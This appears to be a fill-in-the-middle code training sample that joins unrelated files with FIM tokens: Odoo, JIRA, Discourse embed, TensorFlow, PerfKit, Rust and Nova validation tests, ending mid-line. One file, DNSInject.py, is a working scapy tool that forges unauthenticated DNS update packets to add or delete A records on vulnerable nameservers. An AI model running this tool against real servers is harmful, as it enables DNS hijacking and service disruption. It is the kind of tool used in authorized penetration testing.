search_domains.append({ 'code':piece_1, 'name':piece_2, }) #If only one word is typed at the beginning of the search. else: search_domains.append({ 'code':piece_1, 'name':piece_1, }) #Build the search domain for the account browser. search_domain = [] regular_expresion = '%' for domain in search_domains: temp_domain = [] if 'company_ids' in domain.keys(): temp_domain.append(('company_id','in', domain['company_ids'])) if 'code' in domain.keys(): code = domain['code'] code = code.replace('-','').replace('_', '').replace('.','') new_code = regular_expresion for c in code: new_code += c + regular_expresion #ilike is case sensitive temp_domain.append(('code', 'ilike', new_code)) if 'name' in domain.keys(): if domain['name']: temp_domain.append(('name', operator, domain['name'])) #Depend of the quantity of domain, add the & or the '|' #Unlike account can match any change so the '&' by '|' if len(temp_domain) == 1: search_domain += temp_domain elif len(temp_domain) == 2: search_domain.append('|') search_domain += temp_domain else: search_domain.append('|') search_domain.append('&') search_domain += temp_domain number_or = (len(search_domains) / 2) - 1 cont = 0 while cont < number_or: search_domain = ['|'] + search_domain cont += 1 journal_ids = self.pool.get('account.journal').search(cr, uid, search_domain + args, limit=limit, context=context) else: journal_ids = self.pool.get('account.journal').search(cr, uid, [] + args, limit=limit, context=context) return self.name_get(cr, uid, journal_ids, context=context) #search the names that match with the ids. class account_fiscalyear(osv.Model): ''' Adds up to 16 chars to a Fiscal year code ''' _name = 'account.fiscalyear' _inherit = 'account.fiscalyear' _columns = { 'code': fields.char('Code', size=16, required=True, help="The code will be used to generate the numbers of the journal entries of this journal."), } class account_period(osv.Model): ''' Adds up to 16 chars to a Fiscal year code ''' _name = 'account.period' _inherit = 'account.period' _columns = { 'code': fields.char('Code', size=16), }<|fim▁end|>
search_domains.append({'company_ids':company_ids, 'name':piece_2})
<|file_name|>example.py<|end_file_name|><|fim▁begin|>from jira_extended import JIRA jira = JIRA( '<url>', basic_auth=( '<user>', '<password>', ), options={ 'extended_url': '<url>', } )<|fim▁hole|><|fim▁end|>
jira.search_issues('project = "PROJECT1"')[0].move('PROJECT2')
<|file_name|>config.py<|end_file_name|><|fim▁begin|>from phovea_server.ns import Namespace, abort from phovea_server.util import jsonify from phovea_server.config import get as get_config from phovea_server.plugin import list as list_plugins import logging app = Namespace(__name__) _log = logging.getLogger(__name__) @app.route('/<path:path>')<|fim▁hole|> plugin = next((p for p in list_plugins('tdp-config-safe-keys') if p.id == key), None) if plugin is None: _log.error('404: config key "{}" not found'.format(key)) abort(404, 'config key "{}" not found'.format(key)) path[0] = plugin.configKey return jsonify(get_config('.'.join(path))) def create(): return app<|fim▁end|>
def _config(path): path = path.split('/') key = path[0]
<|file_name|>embed.js<|end_file_name|><|fim▁begin|>(function() { var DE = window.DiscourseEmbed || {}; var comments = document.getElementById('discourse-comments'); var iframe = document.createElement('iframe'); ['discourseUrl', 'discourseEmbedUrl', 'discourseUserName'].forEach(function(i) { if (window[i]) { DE[i] = DE[i] || window[i]; } }); var queryParams = {}; if (DE.discourseEmbedUrl) { queryParams.embed_url = encodeURIComponent(DE.discourseEmbedUrl); } if (DE.discourseUserName) { queryParams.discourse_username = DE.discourseUserName; } if (DE.topicId) { queryParams.topic_id = DE.topicId; } var src = DE.discourseUrl + 'embed/comments'; var keys = Object.keys(queryParams); if (keys.length > 0) { src += "?"; for (var i=0; i<keys.length; i++) { if (i > 0) { src += "&"; } var k = keys[i]; src += k + "=" + queryParams[k]; } } iframe.src = src; iframe.id = 'discourse-embed-frame'; iframe.width = "100%"; iframe.frameBorder = "0"; iframe.scrolling = "no"; comments.appendChild(iframe); // Thanks http://amendsoft-javascript.blogspot.ca/2010/04/find-x-and-y-coordinate-of-html-control.html function findPosY(obj) { var top = 0; if(obj.offsetParent) { while(1) { top += obj.offsetTop; if(!obj.offsetParent) break; obj = obj.offsetParent; }<|fim▁hole|> else if(obj.y) { top += obj.y; } return top; } function normalizeUrl(url) { return url.replace(/^https?(\:\/\/)?/, ''); } function postMessageReceived(e) { if (!e) { return; } if (normalizeUrl(DE.discourseUrl).indexOf(normalizeUrl(e.origin)) === -1) { return; } if (e.data) { if (e.data.type === 'discourse-resize' && e.data.height) { iframe.height = e.data.height + "px"; } if (e.data.type === 'discourse-scroll' && e.data.top) { // find iframe offset var destY = findPosY(iframe) + e.data.top; window.scrollTo(0, destY); } } } window.addEventListener('message', postMessageReceived, false); })();<|fim▁end|>
}
<|file_name|>definitions.js<|end_file_name|><|fim▁begin|>define(function () { return [ { "default": { name: 'form1', label: 'Form 1', "_elements": [ { "default": { "name": "id", "type": "hidden" } }, { "default": { "name": "test1", "type": "text", "label": "Test1", "defaultValue": "test1", "page": 0 } }, { "default": { "name": "test2", "type": "text", "label": "Test2", "defaultValue": "test2", "page": 0 } }, { "default": { "name": "calc_button", "type": "button", "label": "Calculate", "persist": false, "page": 0 } }, { "default": { "name": "calc", "type": "message", "label": "Calc", "labelPlacement": "default", "labelStyle": "Plain", "showTextbox": "show", "calculationType": "manual", "buttonText": "Calculate", "persist": true, "page": 0 } } ], "_checks": [ ], "_actions": [ { "default": { "javascript": "\"[test1]\"+\"[test2]\"", "outputTarget": "calc", "name": "CALC_calc" } } ], "_behaviours": [ { "default": { "name": "auto_calculations", "trigger": { "formElements": ["calc_button"] }, "actions": [ "CALC_calc" ] } } ] }<|fim▁hole|><|fim▁end|>
} ]; });
<|file_name|>DNSInject.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python # by Chris Truncer # Script to attempt to forge a packet that will inject a new value # for a dns record. Check nessus plugin #35372 # Some great documentation and sample code came from: # http://bb.secdev.org/scapy/src/46e0b3e619547631d704c133a0247cf4683c0784/scapy/layers/dns.py import argparse import logging # I know it's bad practice to add code up here, but it's the only way I could # see to suppress the IPv6 warning from scapy (By setting this # before importing scapy). logging.getLogger("scapy.runtime").setLevel(logging.ERROR) import os from scapy.all import IP, UDP, DNS, DNSQR, DNSRR, sr1 import sys def add_a_record(name_server, new_dns_record, ip_value): os.system('clear') title() # Verifying all required options have a populated value if name_server is None or new_dns_record is None or ip_value is None: print "[*] ERROR: You did not provide all the required command line options!" print "[*] ERROR: Please re-run with required options." sys.exit() print "[*] Crafting packet for record injection..." print "[*] Sending DNS packet adding " + new_dns_record print "[*] and pointing it to " + ip_value + "\n" dns_zone = new_dns_record[new_dns_record.find(".")+1:] # Craft the packet with scapy add_packet = sr1(IP(dst=name_server)/UDP()/DNS(<|fim▁hole|> opcode=5, qd=[DNSQR(qname=dns_zone, qtype="SOA")], ns=[DNSRR(rrname=new_dns_record, type="A", ttl=120, rdata=ip_value)])) print add_packet[DNS].summary() print "\n[*] Packet created and sent!" def cli_parser(): # Command line argument parser parser = argparse.ArgumentParser( add_help=False, description="DNSInject is a tool for modifying DNS records on vulnerable servers.") parser.add_argument( "--add", action='store_true', help="Add \"A\" record to the vulnerable name server.") parser.add_argument( "--delete", action='store_true', help="Delete \"A\" record from the vulnerable name server.") parser.add_argument( "-ns", metavar="ns1.test.com", help="Nameserver to execute the specified action.") parser.add_argument( "-d", metavar="mynewarecord.test.com", help="Domain name to create an A record for.") parser.add_argument( "-ip", metavar="192.168.1.1", help="IP Address the new record will point to.") parser.add_argument( '-h', '-?', '--h', '-help', '--help', action="store_true", help=argparse.SUPPRESS) args = parser.parse_args() if args.h: parser.print_help() sys.exit() return args.add, args.delete, args.ns, args.d, args.ip def delete_dns_record(del_ns, del_record): os.system('clear') title() # Verifying all required options have a populated value if del_ns is None or del_record is None: print "[*] ERROR: You did not provide all the required command line options!" print "[*] ERROR: Please re-run with required options." sys.exit() print "[*] Crafting packet for record deletion..." print "[*] Sending packet which deletes the following record: " print "[*] " + del_record + "\n" dns_zone = del_record[del_record.find(".")+1:] del_packet = sr1(IP(dst=del_ns)/UDP()/DNS( opcode=5, qd=[DNSQR(qname=dns_zone, qtype="SOA")], ns=[DNSRR(rrname=del_record, type="ALL", rclass="ANY", ttl=0, rdata="")])) print del_packet[DNS].summary() print "\n[*] Packet created and sent!" def title(): print "######################################################################" print "# DNS Injector #" print "######################################################################\n" return if __name__ == '__main__': # Parse command line arguments action_add, action_delete, dns_nameserver, dns_record, dns_ip = cli_parser() #Chose function based on action variable value try: if action_add: add_a_record(dns_nameserver, dns_record, dns_ip) elif action_delete: delete_dns_record(dns_nameserver, dns_record) else: print "[*] ERROR: You didn't provide a valid action." print "[*] ERROR: Restart and provide your desired action!" sys.exit() except AttributeError: os.system('clear') title() print "[*] ERROR: You didn't provide a valid action." print "[*] ERROR: Restart and provide your desired action!"<|fim▁end|>
<|file_name|>QueryScheduleTaskDetailResp.java<|end_file_name|><|fim▁begin|>package com.huawei.esdk.fusionmanager.local.model.system; import com.huawei.esdk.fusionmanager.local.model.FMSDKResponse; /** * 查询计划任务详情返回信息。 * <p> * @since eSDK Cloud V100R003C30 */ public class QueryScheduleTaskDetailResp extends FMSDKResponse { /** * 计划任务。 */ private ScheduleTask scheduleTask; public ScheduleTask getScheduleTask() { return scheduleTask; } public void setScheduleTask(ScheduleTask scheduleTask) { this.scheduleTask = scheduleTask;<|fim▁hole|><|fim▁end|>
} }
<|file_name|>tf_record_iter.py<|end_file_name|><|fim▁begin|># Copyright 2020 The FedLearner Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # coding: utf-8 import logging from collections import OrderedDict from contextlib import contextmanager import tensorflow.compat.v1 as tf import fedlearner.data_join.common as common from fedlearner.data_join.raw_data_iter_impl.raw_data_iter import RawDataIter class TfExampleItem(RawDataIter.Item): def __init__(self, record_str, cache_type=None, index=None): super().__init__() self._cache_type = cache_type self._index = index if self._cache_type: assert self._index is not None,\ "store space is disk, index cann't be None" self._parse_example_error = False example = self._parse_example(record_str) dic = common.convert_tf_example_to_dict(example) # should not be list for data block new_dict = {} for key, val in dic.items(): new_dict[key] = val[0] if len(val) == 1 else val self._features.update({key: new_dict[key] for key in new_dict if key in common.ALLOWED_FIELDS.keys()}) self._set_tf_record(record_str) self._csv_record = None self._gc_example(example) @classmethod def make(cls, example_id, event_time, raw_id, fname=None, fvalue=None): row = OrderedDict() row["example_id"] = example_id.decode() row["event_time"] = event_time if raw_id: row["raw_id"] = raw_id if fname: assert len(fname) == len(fvalue), \ "Field name should match field value" for i, v in enumerate(fname): row[v] = fvalue[i] ex = common.convert_dict_to_tf_example(row) return cls(ex.SerializeToString()) @property def tf_record(self): if self._cache_type: return self._cache_type.get_data(self._index)<|fim▁hole|> def _set_tf_record(self, record_str, cache=False): # if cache set, we switch the store space to memory # to speed up accessing later if self._cache_type and not cache: self._record_str = None self._cache_type.set_data(self._index, record_str) else: self._cache_type = None self._record_str = record_str @property def csv_record(self): if self._csv_record is None: self._csv_record = {} example = self._parse_example(self.tf_record) if not self._parse_example_error: try: self._csv_record = \ common.convert_tf_example_to_dict(example) except Exception as e: # pylint: disable=broad-except logging.error("Failed convert tf example to csv record, "\ "reason %s", e) self._gc_example(example) return self._csv_record def add_extra_fields(self, additional_records, cache=False): example = self._parse_example(self.tf_record) if example is not None: feat = example.features.feature for name, value in additional_records.items(): if name not in common.ALLOWED_FIELDS: continue self._features.update({name: value}) if common.ALLOWED_FIELDS[name].type is bytes: if isinstance(value, str): value = value.encode() feat[name].CopyFrom(tf.train.Feature( bytes_list=tf.train.BytesList(value=[value]) ) ) elif common.ALLOWED_FIELDS[name].type is float: feat[name].CopyFrom(tf.train.Feature( float_list=tf.train.FloatList(value=[value])) ) else: assert common.ALLOWED_FIELDS[name].type is int feat[name].CopyFrom(tf.train.Feature( int64_list=tf.train.Int64List(value=[value])) ) self._set_tf_record(example.SerializeToString(), cache) if self._csv_record is not None: self._csv_record = None self._gc_example(example) def _parse_example(self, record_str): try: if not self._parse_example_error: example = tf.train.Example() example.ParseFromString(record_str) return example except Exception as e: # pylint: disable=broad-except logging.error("Failed parse tf.Example from record %s, reason %s", record_str, e) self._parse_example_error = True return None @staticmethod def _gc_example(example): if example is not None: example.Clear() del example def clear(self): if self._cache_type: self._cache_type.delete(self._index) del self._record_str del self._csv_record class TfRecordIter(RawDataIter): @classmethod def name(cls): return 'TF_RECORD' @contextmanager def _data_set(self, fpath): data_set = None expt = None try: data_set = tf.data.TFRecordDataset( [fpath], compression_type=self._options.compressed_type, num_parallel_reads=1, buffer_size=None if self._options.read_ahead_size <= 0 \ else self._options.read_ahead_size ) batch_size = self._options.read_batch_size if \ self._options.read_batch_size > 0 else 1 data_set = data_set.batch(batch_size) yield data_set except Exception as e: # pylint: disable=broad-except logging.warning("Failed to access file: %s, reason %s", fpath, e) expt = e if data_set is not None: del data_set if expt is not None: raise expt def _inner_iter(self, fpath): with self._data_set(fpath) as data_set: for batch in iter(data_set): for raw_data in batch.numpy(): if not self._validator.check_tfrecord(raw_data): continue index = self._index if index is None: index = 0 yield TfExampleItem(raw_data, self._cache_type, index) def _reset_iter(self, index_meta): if index_meta is not None: fpath = index_meta.fpath fiter = self._inner_iter(fpath) item = next(fiter) return fiter, item return None, None<|fim▁end|>
return self._record_str
<|file_name|>oldisim_benchmark.py<|end_file_name|><|fim▁begin|># Copyright 2015 PerfKitBenchmarker Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Runs oldisim. oldisim is a framework to support benchmarks that emulate Online Data-Intensive (OLDI) workloads, such as web search and social networking. oldisim includes sample workloads built on top of this framework. With its default config, oldisim models an example search topology. A user query is first processed by a front-end server, which then eventually fans out the query to a large number of leaf nodes. The latency is measured at the root of the tree, and often increases with the increase of fan-out. oldisim reports a scaling efficiency for a given topology. The scaling efficiency is defined as queries per second (QPS) at the current fan-out normalized to QPS at fan-out 1 with ISO root latency. Sample command line: ./pkb.py --benchmarks=oldisim --project='YOUR_PROJECT' --oldisim_num_leaves=4 --oldisim_fanout=1,2,3,4 --oldisim_latency_target=40 --oldisim_latency_metric=avg The above command will build a tree with one root node and four leaf nodes. The average latency target is 40ms. The root node will vary the fanout from 1 to 4 and measure the scaling efficiency. """ import logging import re import time from perfkitbenchmarker import configs from perfkitbenchmarker import flags from perfkitbenchmarker import sample from perfkitbenchmarker import vm_util from perfkitbenchmarker.linux_packages import oldisim_dependencies FLAGS = flags.FLAGS flags.DEFINE_integer('oldisim_num_leaves', 4, 'number of leaf nodes', lower_bound=1, upper_bound=64) flags.DEFINE_list('oldisim_fanout', [], 'a list of fanouts to be tested. ' 'a root can connect to a subset of leaf nodes (fanout). ' 'the value of fanout has to be smaller than num_leaves.') flags.DEFINE_enum('oldisim_latency_metric', 'avg', ['avg', '50p', '90p', '95p', '99p', '99.9p'], 'Allowable metrics for end-to-end latency') flags.DEFINE_float('oldisim_latency_target', '30', 'latency target in ms') NUM_DRIVERS = 1 NUM_ROOTS = 1 BENCHMARK_NAME = 'oldisim' BENCHMARK_CONFIG = """ oldisim: description: > Run oldisim. Specify the number of leaf nodes with --oldisim_num_leaves vm_groups: default: vm_spec: *default_single_core """ def GetConfig(user_config): """Decide number of vms needed to run oldisim.""" config = configs.LoadConfig(BENCHMARK_CONFIG, user_config, BENCHMARK_NAME) config['vm_groups']['default']['vm_count'] = (FLAGS.oldisim_num_leaves + NUM_DRIVERS + NUM_ROOTS) return config def InstallAndBuild(vm): """Install and build oldisim on the target vm. Args: vm: A vm instance that runs oldisim. """ logging.info('prepare oldisim on %s', vm) vm.Install('oldisim_dependencies') def Prepare(benchmark_spec): """Install and build oldisim on the target vm. Args: benchmark_spec: The benchmark specification. Contains all data that is required to run the benchmark. """ vms = benchmark_spec.vms leaf_vms = [vm for vm_idx, vm in enumerate(vms) if vm_idx >= (NUM_DRIVERS + NUM_ROOTS)] if vms: vm_util.RunThreaded(InstallAndBuild, vms) # Launch job on the leaf nodes. leaf_server_bin = oldisim_dependencies.BinaryPath('LeafNode') for vm in leaf_vms: leaf_cmd = '%s --threads=%s' % (leaf_server_bin, vm.num_cpus) vm.RemoteCommand('%s &> /dev/null &' % leaf_cmd) def SetupRoot(root_vm, leaf_vms): """Connect a root node to a list of leaf nodes. Args: root_vm: A root vm instance. leaf_vms: A list of leaf vm instances. """ fanout_args = ' '.join(['--leaf=%s' % i.internal_ip for i in leaf_vms]) root_server_bin = oldisim_dependencies.BinaryPath('ParentNode') root_cmd = '%s --threads=%s %s' % (root_server_bin, root_vm.num_cpus, fanout_args) logging.info('Root cmdline: %s', root_cmd) root_vm.RemoteCommand('%s &> /dev/null &' % root_cmd) def ParseOutput(oldisim_output): """Parses the output from oldisim. Args: oldisim_output: A string containing the text of oldisim output. Returns: A tuple of (peak_qps, peak_lat, target_qps, target_lat). """ re_peak = re.compile(r'peak qps = (?P<qps>\S+), latency = (?P<lat>\S+)') re_target = re.compile(r'measured_qps = (?P<qps>\S+), latency = (?P<lat>\S+)') for line in oldisim_output.splitlines(): match = re.search(re_peak, line) if match: peak_qps = float(match.group('qps')) peak_lat = float(match.group('lat')) target_qps = float(peak_qps) target_lat = float(peak_lat) continue match = re.search(re_target, line) if match: target_qps = float(match.group('qps')) target_lat = float(match.group('lat')) return peak_qps, peak_lat, target_qps, target_lat def RunLoadTest(benchmark_spec, fanout): """Run Loadtest for a given topology. Args: benchmark_spec: The benchmark specification. Contains all data that is required to run the benchmark. fanout: Request is first processed by a root node, which then fans out to a subset of leaf nodes. Returns: A tuple of (peak_qps, peak_lat, target_qps, target_lat). """ assert fanout <= FLAGS.oldisim_num_leaves, ( 'The number of leaf nodes a root node connected to is defined by the ' 'flag fanout. Its current value %s is bigger than the total number of ' 'leaves %s.' % (fanout, FLAGS.oldisim_num_leaves)) vms = benchmark_spec.vms driver_vms = [] root_vms = [] leaf_vms = [] for vm_index, vm in enumerate(vms): if vm_index < NUM_DRIVERS:<|fim▁hole|> leaf_vms.append(vm) leaf_vms = leaf_vms[:fanout] for root_vm in root_vms: SetupRoot(root_vm, leaf_vms) driver_vm = driver_vms[0] driver_binary = oldisim_dependencies.BinaryPath('DriverNode') launch_script = oldisim_dependencies.Path('workloads/search/search_qps.sh') driver_args = ' '.join(['--server=%s' % i.internal_ip for i in root_vms]) # Make sure server is up. time.sleep(5) driver_cmd = '%s -s %s:%s -t 30 -- %s %s --threads=%s --depth=16' % ( launch_script, FLAGS.oldisim_latency_metric, FLAGS.oldisim_latency_target, driver_binary, driver_args, driver_vm.num_cpus) logging.info('Driver cmdline: %s', driver_cmd) stdout, _ = driver_vm.RemoteCommand(driver_cmd, should_log=True) return ParseOutput(stdout) def Run(benchmark_spec): """Run oldisim on the target vm. Args: benchmark_spec: The benchmark specification. Contains all data that is required to run the benchmark. Returns: A list of sample.Sample objects. """ results = [] qps_dict = dict() vms = benchmark_spec.vms vm = vms[0] fanout_list = set([1, FLAGS.oldisim_num_leaves]) for fanout in map(int, FLAGS.oldisim_fanout): if fanout > 1 and fanout < FLAGS.oldisim_num_leaves: fanout_list.add(fanout) metadata = {'num_cpus': vm.num_cpus} metadata.update(vm.GetMachineTypeDict()) for fanout in sorted(fanout_list): qps = RunLoadTest(benchmark_spec, fanout)[2] qps_dict[fanout] = qps if fanout == 1: base_qps = qps name = 'Scaling efficiency of %s leaves' % fanout scaling_efficiency = round(min(qps_dict[fanout] / base_qps, 1), 2) results.append(sample.Sample(name, scaling_efficiency, '', metadata)) return results def Cleanup(benchmark_spec): # pylint: disable=unused-argument """Cleanup oldisim on the target vm. Args: benchmark_spec: The benchmark specification. Contains all data that is required to run the benchmark. """ vms = benchmark_spec.vms for vm_index, vm in enumerate(vms): if vm_index >= NUM_DRIVERS and vm_index < (NUM_DRIVERS + NUM_ROOTS): vm.RemoteCommand('sudo pkill ParentNode') elif vm_index >= (NUM_DRIVERS + NUM_ROOTS): vm.RemoteCommand('sudo pkill LeafNode')<|fim▁end|>
driver_vms.append(vm) elif vm_index < (NUM_DRIVERS + NUM_ROOTS): root_vms.append(vm) else:
<|file_name|>escape.rs<|end_file_name|><|fim▁begin|>// Copyright 2013 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. //! HTML Escaping //! //! This module contains one unit-struct which can be used to HTML-escape a //! string of text (for use in a format string). use std::fmt; /// Wrapper struct which will emit the HTML-escaped version of the contained /// string when passed to a format string. pub struct Escape<'a>(&'a str); impl<'a> fmt::Default for Escape<'a> { fn fmt(s: &Escape<'a>, fmt: &mut fmt::Formatter) { // Because the internet is always right, turns out there's not that many // characters to escape: http://stackoverflow.com/questions/7381974 let Escape(s) = *s; let pile_o_bits = s.as_slice(); let mut last = 0; for (i, ch) in s.bytes().enumerate() { match ch as char { '<' | '>' | '&' | '\'' | '"' => { fmt.buf.write(pile_o_bits.slice(last, i).as_bytes()); let s = match ch as char { '>' => "&gt;", '<' => "&lt;", '&' => "&amp;", '\'' => "&#39;",<|fim▁hole|> last = i + 1; } _ => {} } } if last < s.len() { fmt.buf.write(pile_o_bits.slice_from(last).as_bytes()); } } }<|fim▁end|>
'"' => "&quot;", _ => unreachable!() }; fmt.buf.write(s.as_bytes());
<|file_name|>test_api_validation.py<|end_file_name|><|fim▁begin|># Copyright 2013 NEC Corporation. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import copy import re import fixtures from jsonschema import exceptions as jsonschema_exc import six from nova.api.openstack import api_version_request as api_version from nova.api import validation from nova.api.validation import parameter_types from nova.api.validation import validators from nova import exception from nova import test from nova.tests.unit.api.openstack import fakes query_schema = { 'type': 'object', 'properties': { 'foo': parameter_types.single_param({'type': 'string', 'format': 'uuid'}), 'foos': parameter_types.multi_params({'type': 'string'}) }, 'patternProperties': { "^_": parameter_types.multi_params({'type': 'string'})}, 'additionalProperties': True } class FakeQueryParametersController(object): @validation.query_schema(query_schema, '2.3') def get(self, req): return list(set(req.GET.keys())) class RegexFormatFakeController(object): schema = { 'type': 'object', 'properties': { 'foo': { 'format': 'regex', }, }, } @validation.schema(request_body_schema=schema) def post(self, req, body): return 'Validation succeeded.' class FakeRequest(object): api_version_request = api_version.APIVersionRequest("2.1") environ = {} legacy_v2 = False def is_legacy_v2(self): return self.legacy_v2 class ValidationRegex(test.NoDBTestCase): def test_build_regex_range(self): # this is much easier to think about if we only use the ascii # subset because it's a printable range we can think # about. The algorithm works for all ranges. def _get_all_chars(): for i in range(0x7F): yield six.unichr(i) self.useFixture(fixtures.MonkeyPatch( 'nova.api.validation.parameter_types._get_all_chars', _get_all_chars)) # note that since we use only the ascii range in the tests # we have to clear the cache to recompute them. parameter_types._reset_cache() r = parameter_types._build_regex_range(ws=False) self.assertEqual(r, re.escape('!') + '-' + re.escape('~')) # if we allow whitespace the range starts earlier r = parameter_types._build_regex_range(ws=True) self.assertEqual(r, re.escape(' ') + '-' + re.escape('~')) # excluding a character will give us 2 ranges r = parameter_types._build_regex_range(ws=True, exclude=['A']) self.assertEqual(r, re.escape(' ') + '-' + re.escape('@') + 'B' + '-' + re.escape('~')) # inverting which gives us all the initial unprintable characters. r = parameter_types._build_regex_range(ws=False, invert=True) self.assertEqual(r, re.escape('\x00') + '-' + re.escape(' ')) # excluding characters that create a singleton. Naively this would be: # ' -@B-BD-~' which seems to work, but ' -@BD-~' is more natural. r = parameter_types._build_regex_range(ws=True, exclude=['A', 'C']) self.assertEqual(r, re.escape(' ') + '-' + re.escape('@') + 'B' + 'D' + '-' + re.escape('~')) # ws=True means the positive regex has printable whitespaces, # so the inverse will not. The inverse will include things we # exclude. r = parameter_types._build_regex_range( ws=True, exclude=['A', 'B', 'C', 'Z'], invert=True) self.assertEqual(r, re.escape('\x00') + '-' + re.escape('\x1f') + 'A-CZ') class APIValidationTestCase(test.NoDBTestCase): post_schema = None def setUp(self): super(APIValidationTestCase, self).setUp() self.post = None if self.post_schema is not None: @validation.schema(request_body_schema=self.post_schema) def post(req, body): return 'Validation succeeded.' self.post = post def check_validation_error(self, method, body, expected_detail, req=None): if not req: req = FakeRequest() try: method(body=body, req=req) except exception.ValidationError as ex: self.assertEqual(400, ex.kwargs['code']) if isinstance(expected_detail, list): self.assertIn(ex.kwargs['detail'], expected_detail, 'Exception details did not match expected') elif not re.match(expected_detail, ex.kwargs['detail']): self.assertEqual(expected_detail, ex.kwargs['detail'], 'Exception details did not match expected') except Exception as ex: self.fail('An unexpected exception happens: %s' % ex) else: self.fail('Any exception does not happen.') class FormatCheckerTestCase(test.NoDBTestCase): def _format_checker(self, format, value, error_message): format_checker = validators.FormatChecker() exc = self.assertRaises(jsonschema_exc.FormatError, format_checker.check, value, format) self.assertIsInstance(exc.cause, exception.InvalidName) self.assertEqual(error_message, exc.cause.format_message()) def test_format_checker_failed_with_non_string_name(self): error_message = ("An invalid 'name' value was provided. The name must " "be: printable characters. " "Can not start or end with whitespace.") self._format_checker("name", " ", error_message) self._format_checker("name", None, error_message) def test_format_checker_failed_name_with_leading_trailing_spaces(self): error_message = ("An invalid 'name' value was provided. " "The name must be: printable characters with at " "least one non space character") self._format_checker("name_with_leading_trailing_spaces", None, error_message) class MicroversionsSchemaTestCase(APIValidationTestCase): def setUp(self): super(MicroversionsSchemaTestCase, self).setUp() schema_v21_int = { 'type': 'object', 'properties': { 'foo': { 'type': 'integer', } } } schema_v20_str = copy.deepcopy(schema_v21_int) schema_v20_str['properties']['foo'] = {'type': 'string'} @validation.schema(schema_v20_str, '2.0', '2.0') @validation.schema(schema_v21_int, '2.1') def post(req, body): return 'Validation succeeded.' self.post = post def test_validate_v2compatible_request(self): req = FakeRequest() req.legacy_v2 = True self.assertEqual(self.post(body={'foo': 'bar'}, req=req), 'Validation succeeded.') detail = ("Invalid input for field/attribute foo. Value: 1. " "1 is not of type 'string'") self.check_validation_error(self.post, body={'foo': 1}, expected_detail=detail, req=req) def test_validate_v21_request(self): req = FakeRequest() self.assertEqual(self.post(body={'foo': 1}, req=req), 'Validation succeeded.') detail = ("Invalid input for field/attribute foo. Value: bar. " "'bar' is not of type 'integer'") self.check_validation_error(self.post, body={'foo': 'bar'}, expected_detail=detail, req=req) def test_validate_v2compatible_request_with_none_min_version(self): schema_none = { 'type': 'object', 'properties': { 'foo': { 'type': 'integer' } } } @validation.schema(schema_none) def post(req, body): return 'Validation succeeded.' req = FakeRequest() req.legacy_v2 = True self.assertEqual('Validation succeeded.', post(body={'foo': 1}, req=req)) detail = ("Invalid input for field/attribute foo. Value: bar. " "'bar' is not of type 'integer'") self.check_validation_error(post, body={'foo': 'bar'}, expected_detail=detail, req=req) class QueryParamsSchemaTestCase(test.NoDBTestCase): def setUp(self): super(QueryParamsSchemaTestCase, self).setUp() self.controller = FakeQueryParametersController() def test_validate_request(self): req = fakes.HTTPRequest.blank("/tests?foo=%s" % fakes.FAKE_UUID) req.api_version_request = api_version.APIVersionRequest("2.3") self.assertEqual(['foo'], self.controller.get(req)) def test_validate_request_failed(self): # parameter 'foo' expect a UUID req = fakes.HTTPRequest.blank("/tests?foo=abc") req.api_version_request = api_version.APIVersionRequest("2.3") ex = self.assertRaises(exception.ValidationError, self.controller.get, req) if six.PY3: self.assertEqual("Invalid input for query parameters foo. Value: " "abc. 'abc' is not a 'uuid'", six.text_type(ex)) else: self.assertEqual("Invalid input for query parameters foo. Value: " "abc. u'abc' is not a 'uuid'", six.text_type(ex)) def test_validate_request_with_multiple_values(self): req = fakes.HTTPRequest.blank("/tests?foos=abc") req.api_version_request = api_version.APIVersionRequest("2.3") self.assertEqual(['foos'], self.controller.get(req)) req = fakes.HTTPRequest.blank("/tests?foos=abc&foos=def") self.assertEqual(['foos'], self.controller.get(req)) def test_validate_request_with_multiple_values_fails(self): req = fakes.HTTPRequest.blank( "/tests?foo=%s&foo=%s" % (fakes.FAKE_UUID, fakes.FAKE_UUID)) req.api_version_request = api_version.APIVersionRequest("2.3") self.assertRaises(exception.ValidationError, self.controller.get, req) def test_validate_request_unicode_decode_failure(self): req = fakes.HTTPRequest.blank("/tests?foo=%88") req.api_version_request = api_version.APIVersionRequest("2.1") ex = self.assertRaises( exception.ValidationError, self.controller.get, req) self.assertIn("Query string is not UTF-8 encoded", six.text_type(ex)) def test_strip_out_additional_properties(self): req = fakes.HTTPRequest.blank( "/tests?foos=abc&foo=%s&bar=123&-bar=456" % fakes.FAKE_UUID) req.api_version_request = api_version.APIVersionRequest("2.3") res = self.controller.get(req) res.sort() self.assertEqual(['foo', 'foos'], res) def test_no_strip_out_additional_properties_when_not_match_version(self): req = fakes.HTTPRequest.blank( "/tests?foos=abc&foo=%s&bar=123&bar=456" % fakes.FAKE_UUID) # The JSON-schema matches to the API version 2.3 and above. Request # with version 2.1 to ensure there isn't no strip out for additional # parameters when schema didn't match the request version. req.api_version_request = api_version.APIVersionRequest("2.1") res = self.controller.get(req) res.sort() self.assertEqual(['bar', 'foo', 'foos'], res) def test_strip_out_correct_pattern_retained(self): req = 